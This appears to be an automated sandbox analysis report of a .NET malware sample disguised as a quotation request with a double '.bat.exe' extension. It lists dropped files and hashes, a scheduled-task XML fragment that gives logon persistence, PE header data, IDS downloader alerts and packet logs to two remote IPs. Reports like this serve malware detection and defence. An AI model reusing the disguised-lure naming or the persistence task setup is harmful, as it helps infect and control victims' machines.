Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\tmp2F66.tmp

Download File

Process:	C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe
File Type:	XML 1.0 document, ASCII text
Category:	dropped
Size (bytes):	1583
Entropy (8bit):	5.102914204921392
Encrypted:	false
SSDEEP:	24:2di4+S2qhlZ1Muy1my3UnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtVJxvn:cgergYrFdOFzOzN33ODOiDdKrsuTRv
MD5:	C4B6C2328162A258D5BBEE03B7D696CA
SHA1:	CE54C9B4E8D9B7FC4A38EA900C29FDC6E98C43C6
SHA-256:	C479C1800B451FB3493B0F51A6FA474FE5BB8566C92BE4D1C2408480ED2FF0D6
SHA-512:	1EA8BF40F37A95955D3B987A1CAE958AC3C91A00F9F552C63C4630117A3910FE8D280773B1AD19A93D57C240DDF2AC170EA19079DA238D11AC50A68F2338ED13
Malicious:	true
Preview:	<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetwor

C:\Users\user\AppData\Local\Temp\tmp42C0.tmp

Download File

Process:	C:\Users\user\AppData\Roaming\jnqeRRexnD.exe
File Type:	XML 1.0 document, ASCII text
Category:	dropped
Size (bytes):	1583
Entropy (8bit):	5.102914204921392
Encrypted:	false
SSDEEP:	24:2di4+S2qhlZ1Muy1my3UnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtVJxvn:cgergYrFdOFzOzN33ODOiDdKrsuTRv
MD5:	C4B6C2328162A258D5BBEE03B7D696CA
SHA1:	CE54C9B4E8D9B7FC4A38EA900C29FDC6E98C43C6
SHA-256:	C479C1800B451FB3493B0F51A6FA474FE5BB8566C92BE4D1C2408480ED2FF0D6
SHA-512:	1EA8BF40F37A95955D3B987A1CAE958AC3C91A00F9F552C63C4630117A3910FE8D280773B1AD19A93D57C240DDF2AC170EA19079DA238D11AC50A68F2338ED13
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetwor

C:\Users\user\AppData\Roaming\jnqeRRexnD.exe

Download File

Process:	C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	787968
Entropy (8bit):	7.937656149965491
Encrypted:	false
SSDEEP:	12288:nrOm+Ri3AgFdiFJ02txMwyv75ykUeobZ+G8uRGYK9dQLtVd+8hbi7E078mDX:SQ3AgQJHtxzPkrob827UQr/QE078mDX
MD5:	7B5985233FAF11890E9CF4C7B579983B
SHA1:	CB2F20AD79EA7D8A1758AC2AE90A1C6D7F47E784
SHA-256:	5CCE0CED936E5D9C13D6A4A8A3C149371C92236EB4C465E0E422142946509CEA
SHA-512:	BB8DD656EBF8A7C3C1A2ABB86D10E0647E6C84F5D090EC8725FCA504691F517C8B5776E2305BF041551E3D311ECD5797371A9C2CF77714EE8AC03B477B42CD0B
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 34%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....P=g..............0...... ........... ... ....@.. .......................`............`.....................................O.... ..\|....................@....................................................... ............... ..H............text........ ...................... ..`.rsrc...\|.... ......................@..@.reloc.......@......................@..B........................H........6...(...........^...............................................(......}.....{....r...p .....o5....{....o7...&....0...........{......o9.....}........&.......................0..t........o.....{.....{....r...p(....o:.......+%.....{.....o....o;.....o......&....X....i2..{.....o<.......&.{....o=..............+..E..........\b......2.{....oA...n.(......}......}.....(....*....0...........{....o......3...%..;.o......{....o.....s......{.......o....,ir5..p..o......+...(...

C:\Users\user\AppData\Roaming\jnqeRRexnD.exe:Zone.Identifier

Download File

Process:	C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Preview:	[ZoneTransfer]....ZoneId=0

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.937656149965491
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.80% Win32 Executable (generic) a (10002005/4) 49.75% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Windows Screen Saver (13104/52) 0.07% Generic Win/DOS Executable (2004/3) 0.01%
File name:	Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe
File size:	787'968 bytes
MD5:	7b5985233faf11890e9cf4c7b579983b
SHA1:	cb2f20ad79ea7d8a1758ac2ae90a1c6d7f47e784
SHA256:	5cce0ced936e5d9c13d6a4a8a3c149371c92236eb4c465e0e422142946509cea
SHA512:	bb8dd656ebf8a7c3c1a2abb86d10e0647e6c84f5d090ec8725fca504691f517c8b5776e2305bf041551e3d311ecd5797371a9c2cf77714ee8ac03b477b42cd0b
SSDEEP:	12288:nrOm+Ri3AgFdiFJ02txMwyv75ykUeobZ+G8uRGYK9dQLtVd+8hbi7E078mDX:SQ3AgQJHtxzPkrob827UQr/QE078mDX
TLSH:	C7F4239AB3810832E47F01F4985251986338FCC99F15CA5C888D15AE9F73B99CE967F3
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....P=g..............0...... ........... ... ....@.. .......................`............`................................

File Icon


Icon Hash:	8bdb4b414d656d61

Static PE Info

General

Entrypoint:	0x4c02e6
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x673D50B2 [Wed Nov 20 03:00:02 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xc0294	0x4f	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xc2000	0x1d7c	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0xc4000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0xbe2ec	0xbe400	776961d7b579d7085e1a528b36bc0eeb	False	0.9610427274967148	data	7.944191004977694	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0xc2000	0x1d7c	0x1e00	a9a9c1daa7c967a7239e210098d25ed8	False	0.8063802083333333	data	7.32253389530533	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0xc4000	0xc	0x200	39a3bf7a51036de48ab151b1e8dca785	False	0.041015625	data	0.07763316234324169	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	ZLIB Complexity
RT_ICON	0xc2100	0x1733	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced	0.9151372284896447
RT_GROUP_ICON	0xc3844	0x14	data	1.05
RT_VERSION	0xc3868	0x314	data	0.4352791878172589
RT_MANIFEST	0xc3b8c	0x1ea	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators	0.5489795918367347

Imports

DLL	Import
mscoree.dll	_CorExeMain

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-11-20T09:33:05.413269+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.5	49708	158.101.44.242	80	TCP
2024-11-20T09:33:06.616399+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.5	49708	158.101.44.242	80	TCP
2024-11-20T09:33:07.122710+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.5	49710	188.114.96.3	443	TCP
2024-11-20T09:33:07.803913+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.5	49712	158.101.44.242	80	TCP
2024-11-20T09:33:10.225779+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.5	49717	158.101.44.242	80	TCP
2024-11-20T09:33:11.194526+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.5	49717	158.101.44.242	80	TCP
2024-11-20T09:33:11.760095+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.5	49722	188.114.96.3	443	TCP
2024-11-20T09:33:12.382036+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.5	49724	158.101.44.242	80	TCP
2024-11-20T09:33:13.280365+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.5	49727	188.114.96.3	443	TCP
2024-11-20T09:33:15.367632+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.5	49734	188.114.96.3	443	TCP
2024-11-20T09:33:15.821025+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.5	49735	188.114.96.3	443	TCP
2024-11-20T09:33:17.792972+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.5	49740	188.114.96.3	443	TCP
2024-11-20T09:33:19.152668+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.5	49745	188.114.96.3	443	TCP
2024-11-20T09:33:20.453006+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.5	49760	188.114.96.3	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 20, 2024 09:33:04.629689932 CET	49708	80	192.168.2.5	158.101.44.242
Nov 20, 2024 09:33:04.635080099 CET	80	49708	158.101.44.242	192.168.2.5
Nov 20, 2024 09:33:04.635170937 CET	49708	80	192.168.2.5	158.101.44.242
Nov 20, 2024 09:33:04.635445118 CET	49708	80	192.168.2.5	158.101.44.242
Nov 20, 2024 09:33:04.640367031 CET	80	49708	158.101.44.242	192.168.2.5
Nov 20, 2024 09:33:05.200486898 CET	80	49708	158.101.44.242	192.168.2.5
Nov 20, 2024 09:33:05.207741976 CET	49708	80	192.168.2.5	158.101.44.242
Nov 20, 2024 09:33:05.215409040 CET	80	49708	158.101.44.242	192.168.2.5
Nov 20, 2024 09:33:05.363385916 CET	80	49708	158.101.44.242	192.168.2.5
Nov 20, 2024 09:33:05.413269043 CET	49708	80	192.168.2.5	158.101.44.242
Nov 20, 2024 09:33:05.446562052 CET	49709	443	192.168.2.5	188.114.96.3
Nov 20, 2024 09:33:05.446650028 CET	443	49709	188.114.96.3	192.168.2.5
Nov 20, 2024 09:33:05.446743011 CET	49709	443	192.168.2.5	188.114.96.3
Nov 20, 2024 09:33:05.452743053 CET	49709	443	192.168.2.5	188.114.96.3
Nov 20, 2024 09:33:05.452771902 CET	443	49709	188.114.96.3	192.168.2.5
Nov 20, 2024 09:33:05.924583912 CET	443	49709	188.114.96.3	192.168.2.5
Nov 20, 2024 09:33:05.924674988 CET	49709	443	192.168.2.5	188.114.96.3
Nov 20, 2024 09:33:05.929588079 CET	49709	443	192.168.2.5	188.114.96.3
Nov 20, 2024 09:33:05.929617882 CET	443	49709	188.114.96.3	192.168.2.5
Nov 20, 2024 09:33:05.930181980 CET	443	49709	188.114.96.3	192.168.2.5
Nov 20, 2024 09:33:06.116399050 CET	49709	443	192.168.2.5	188.114.96.3
Nov 20, 2024 09:33:06.221272945 CET	49709	443	192.168.2.5	188.114.96.3
Nov 20, 2024 09:33:06.267338991 CET	443	49709	188.114.96.3	192.168.2.5
Nov 20, 2024 09:33:06.327519894 CET	443	49709	188.114.96.3	192.168.2.5
Nov 20, 2024 09:33:06.327613115 CET	443	49709	188.114.96.3	192.168.2.5
Nov 20, 2024 09:33:06.327732086 CET	49709	443	192.168.2.5	188.114.96.3
Nov 20, 2024 09:33:06.334332943 CET	49709	443	192.168.2.5	188.114.96.3
Nov 20, 2024 09:33:06.344805002 CET	49708	80	192.168.2.5	158.101.44.242
Nov 20, 2024 09:33:06.353038073 CET	80	49708	158.101.44.242	192.168.2.5
Nov 20, 2024 09:33:06.502743959 CET	80	49708	158.101.44.242	192.168.2.5
Nov 20, 2024 09:33:06.511845112 CET	49710	443	192.168.2.5	188.114.96.3
Nov 20, 2024 09:33:06.511888027 CET	443	49710	188.114.96.3	192.168.2.5
Nov 20, 2024 09:33:06.511948109 CET	49710	443	192.168.2.5	188.114.96.3
Nov 20, 2024 09:33:06.512264967 CET	49710	443	192.168.2.5	188.114.96.3
Nov 20, 2024 09:33:06.512281895 CET	443	49710	188.114.96.3	192.168.2.5
Nov 20, 2024 09:33:06.616399050 CET	49708	80	192.168.2.5	158.101.44.242
Nov 20, 2024 09:33:06.987215996 CET	443	49710	188.114.96.3	192.168.2.5
Nov 20, 2024 09:33:06.990252972 CET	49710	443	192.168.2.5	188.114.96.3
Nov 20, 2024 09:33:06.990272999 CET	443	49710	188.114.96.3	192.168.2.5
Nov 20, 2024 09:33:07.122685909 CET	443	49710	188.114.96.3	192.168.2.5
Nov 20, 2024 09:33:07.122745991 CET	443	49710	188.114.96.3	192.168.2.5
Nov 20, 2024 09:33:07.122831106 CET	49710	443	192.168.2.5	188.114.96.3
Nov 20, 2024 09:33:07.124629021 CET	49710	443	192.168.2.5	188.114.96.3
Nov 20, 2024 09:33:07.129754066 CET	49708	80	192.168.2.5	158.101.44.242
Nov 20, 2024 09:33:07.131047964 CET	49712	80	192.168.2.5	158.101.44.242
Nov 20, 2024 09:33:07.135059118 CET	80	49708	158.101.44.242	192.168.2.5
Nov 20, 2024 09:33:07.135140896 CET	49708	80	192.168.2.5	158.101.44.242
Nov 20, 2024 09:33:07.136010885 CET	80	49712	158.101.44.242	192.168.2.5
Nov 20, 2024 09:33:07.136102915 CET	49712	80	192.168.2.5	158.101.44.242
Nov 20, 2024 09:33:07.136194944 CET	49712	80	192.168.2.5	158.101.44.242
Nov 20, 2024 09:33:07.141104937 CET	80	49712	158.101.44.242	192.168.2.5
Nov 20, 2024 09:33:07.719619989 CET	80	49712	158.101.44.242	192.168.2.5
Nov 20, 2024 09:33:07.721000910 CET	49714	443	192.168.2.5	188.114.96.3
Nov 20, 2024 09:33:07.721105099 CET	443	49714	188.114.96.3	192.168.2.5
Nov 20, 2024 09:33:07.721245050 CET	49714	443	192.168.2.5	188.114.96.3
Nov 20, 2024 09:33:07.721510887 CET	49714	443	192.168.2.5	188.114.96.3
Nov 20, 2024 09:33:07.721546888 CET	443	49714	188.114.96.3	192.168.2.5
Nov 20, 2024 09:33:07.803913116 CET	49712	80	192.168.2.5	158.101.44.242
Nov 20, 2024 09:33:08.205955029 CET	443	49714	188.114.96.3	192.168.2.5
Nov 20, 2024 09:33:08.207910061 CET	49714	443	192.168.2.5	188.114.96.3
Nov 20, 2024 09:33:08.207983017 CET	443	49714	188.114.96.3	192.168.2.5
Nov 20, 2024 09:33:08.368762016 CET	443	49714	188.114.96.3	192.168.2.5
Nov 20, 2024 09:33:08.368828058 CET	443	49714	188.114.96.3	192.168.2.5
Nov 20, 2024 09:33:08.368913889 CET	49714	443	192.168.2.5	188.114.96.3
Nov 20, 2024 09:33:08.369318962 CET	49714	443	192.168.2.5	188.114.96.3
Nov 20, 2024 09:33:08.374795914 CET	49715	80	192.168.2.5	158.101.44.242
Nov 20, 2024 09:33:08.383630991 CET	80	49715	158.101.44.242	192.168.2.5
Nov 20, 2024 09:33:08.383769035 CET	49715	80	192.168.2.5	158.101.44.242
Nov 20, 2024 09:33:08.383829117 CET	49715	80	192.168.2.5	158.101.44.242
Nov 20, 2024 09:33:08.392853022 CET	80	49715	158.101.44.242	192.168.2.5
Nov 20, 2024 09:33:08.983076096 CET	80	49715	158.101.44.242	192.168.2.5
Nov 20, 2024 09:33:08.984455109 CET	49716	443	192.168.2.5	188.114.96.3
Nov 20, 2024 09:33:08.984540939 CET	443	49716	188.114.96.3	192.168.2.5
Nov 20, 2024 09:33:08.984633923 CET	49716	443	192.168.2.5	188.114.96.3
Nov 20, 2024 09:33:08.984893084 CET	49716	443	192.168.2.5	188.114.96.3
Nov 20, 2024 09:33:08.984925032 CET	443	49716	188.114.96.3	192.168.2.5
Nov 20, 2024 09:33:09.038275003 CET	49715	80	192.168.2.5	158.101.44.242
Nov 20, 2024 09:33:09.424849033 CET	49717	80	192.168.2.5	158.101.44.242
Nov 20, 2024 09:33:09.431904078 CET	80	49717	158.101.44.242	192.168.2.5
Nov 20, 2024 09:33:09.431998968 CET	49717	80	192.168.2.5	158.101.44.242
Nov 20, 2024 09:33:09.432219028 CET	49717	80	192.168.2.5	158.101.44.242
Nov 20, 2024 09:33:09.437232971 CET	80	49717	158.101.44.242	192.168.2.5
Nov 20, 2024 09:33:09.457530975 CET	443	49716	188.114.96.3	192.168.2.5
Nov 20, 2024 09:33:09.459427118 CET	49716	443	192.168.2.5	188.114.96.3
Nov 20, 2024 09:33:09.459517002 CET	443	49716	188.114.96.3	192.168.2.5
Nov 20, 2024 09:33:09.605206966 CET	443	49716	188.114.96.3	192.168.2.5
Nov 20, 2024 09:33:09.605289936 CET	443	49716	188.114.96.3	192.168.2.5
Nov 20, 2024 09:33:09.605609894 CET	49716	443	192.168.2.5	188.114.96.3
Nov 20, 2024 09:33:09.605741978 CET	49716	443	192.168.2.5	188.114.96.3
Nov 20, 2024 09:33:09.609369993 CET	49715	80	192.168.2.5	158.101.44.242
Nov 20, 2024 09:33:09.610357046 CET	49718	80	192.168.2.5	158.101.44.242
Nov 20, 2024 09:33:09.614516973 CET	80	49715	158.101.44.242	192.168.2.5
Nov 20, 2024 09:33:09.614757061 CET	49715	80	192.168.2.5	158.101.44.242
Nov 20, 2024 09:33:09.615288973 CET	80	49718	158.101.44.242	192.168.2.5
Nov 20, 2024 09:33:09.615381002 CET	49718	80	192.168.2.5	158.101.44.242
Nov 20, 2024 09:33:09.615515947 CET	49718	80	192.168.2.5	158.101.44.242
Nov 20, 2024 09:33:09.620384932 CET	80	49718	158.101.44.242	192.168.2.5
Nov 20, 2024 09:33:10.016171932 CET	80	49717	158.101.44.242	192.168.2.5
Nov 20, 2024 09:33:10.019756079 CET	49717	80	192.168.2.5	158.101.44.242
Nov 20, 2024 09:33:10.024643898 CET	80	49717	158.101.44.242	192.168.2.5
Nov 20, 2024 09:33:10.177064896 CET	80	49717	158.101.44.242	192.168.2.5
Nov 20, 2024 09:33:10.178440094 CET	80	49718	158.101.44.242	192.168.2.5
Nov 20, 2024 09:33:10.180437088 CET	49719	443	192.168.2.5	188.114.96.3
Nov 20, 2024 09:33:10.180490971 CET	443	49719	188.114.96.3	192.168.2.5
Nov 20, 2024 09:33:10.180587053 CET	49719	443	192.168.2.5	188.114.96.3
Nov 20, 2024 09:33:10.180850029 CET	49719	443	192.168.2.5	188.114.96.3
Nov 20, 2024 09:33:10.180871010 CET	443	49719	188.114.96.3	192.168.2.5
Nov 20, 2024 09:33:10.215430021 CET	49720	443	192.168.2.5	188.114.96.3
Nov 20, 2024 09:33:10.215483904 CET	443	49720	188.114.96.3	192.168.2.5
Nov 20, 2024 09:33:10.215559959 CET	49720	443	192.168.2.5	188.114.96.3
Nov 20, 2024 09:33:10.219661951 CET	49720	443	192.168.2.5	188.114.96.3
Nov 20, 2024 09:33:10.219706059 CET	443	49720	188.114.96.3	192.168.2.5
Nov 20, 2024 09:33:10.225768089 CET	49718	80	192.168.2.5	158.101.44.242
Nov 20, 2024 09:33:10.225779057 CET	49717	80	192.168.2.5	158.101.44.242
Nov 20, 2024 09:33:10.654916048 CET	443	49719	188.114.96.3	192.168.2.5
Nov 20, 2024 09:33:10.656754971 CET	49719	443	192.168.2.5	188.114.96.3
Nov 20, 2024 09:33:10.656775951 CET	443	49719	188.114.96.3	192.168.2.5
Nov 20, 2024 09:33:10.694224119 CET	443	49720	188.114.96.3	192.168.2.5
Nov 20, 2024 09:33:10.694307089 CET	49720	443	192.168.2.5	188.114.96.3
Nov 20, 2024 09:33:10.696271896 CET	49720	443	192.168.2.5	188.114.96.3
Nov 20, 2024 09:33:10.696285009 CET	443	49720	188.114.96.3	192.168.2.5
Nov 20, 2024 09:33:10.696693897 CET	443	49720	188.114.96.3	192.168.2.5
Nov 20, 2024 09:33:10.741403103 CET	49720	443	192.168.2.5	188.114.96.3
Nov 20, 2024 09:33:10.804095984 CET	443	49719	188.114.96.3	192.168.2.5
Nov 20, 2024 09:33:10.804275036 CET	443	49719	188.114.96.3	192.168.2.5
Nov 20, 2024 09:33:10.804343939 CET	49719	443	192.168.2.5	188.114.96.3
Nov 20, 2024 09:33:10.804826975 CET	49719	443	192.168.2.5	188.114.96.3
Nov 20, 2024 09:33:10.809361935 CET	49718	80	192.168.2.5	158.101.44.242
Nov 20, 2024 09:33:10.809953928 CET	49721	80	192.168.2.5	158.101.44.242
Nov 20, 2024 09:33:10.814591885 CET	80	49718	158.101.44.242	192.168.2.5
Nov 20, 2024 09:33:10.814659119 CET	49718	80	192.168.2.5	158.101.44.242
Nov 20, 2024 09:33:10.815289021 CET	80	49721	158.101.44.242	192.168.2.5
Nov 20, 2024 09:33:10.815352917 CET	49721	80	192.168.2.5	158.101.44.242
Nov 20, 2024 09:33:10.815464020 CET	49721	80	192.168.2.5	158.101.44.242
Nov 20, 2024 09:33:10.820328951 CET	80	49721	158.101.44.242	192.168.2.5
Nov 20, 2024 09:33:10.868866920 CET	49720	443	192.168.2.5	188.114.96.3
Nov 20, 2024 09:33:10.911334038 CET	443	49720	188.114.96.3	192.168.2.5
Nov 20, 2024 09:33:10.980528116 CET	443	49720	188.114.96.3	192.168.2.5
Nov 20, 2024 09:33:10.981136084 CET	443	49720	188.114.96.3	192.168.2.5
Nov 20, 2024 09:33:10.981228113 CET	49720	443	192.168.2.5	188.114.96.3
Nov 20, 2024 09:33:10.984064102 CET	49720	443	192.168.2.5	188.114.96.3
Nov 20, 2024 09:33:10.987672091 CET	49717	80	192.168.2.5	158.101.44.242
Nov 20, 2024 09:33:10.995872021 CET	80	49717	158.101.44.242	192.168.2.5
Nov 20, 2024 09:33:11.148333073 CET	80	49717	158.101.44.242	192.168.2.5
Nov 20, 2024 09:33:11.150279045 CET	49722	443	192.168.2.5	188.114.96.3
Nov 20, 2024 09:33:11.150326967 CET	443	49722	188.114.96.3	192.168.2.5
Nov 20, 2024 09:33:11.150619984 CET	49722	443	192.168.2.5	188.114.96.3
Nov 20, 2024 09:33:11.150902987 CET	49722	443	192.168.2.5	188.114.96.3
Nov 20, 2024 09:33:11.150924921 CET	443	49722	188.114.96.3	192.168.2.5
Nov 20, 2024 09:33:11.194525957 CET	49717	80	192.168.2.5	158.101.44.242
Nov 20, 2024 09:33:11.378704071 CET	80	49721	158.101.44.242	192.168.2.5
Nov 20, 2024 09:33:11.380004883 CET	49723	443	192.168.2.5	188.114.96.3
Nov 20, 2024 09:33:11.380076885 CET	443	49723	188.114.96.3	192.168.2.5
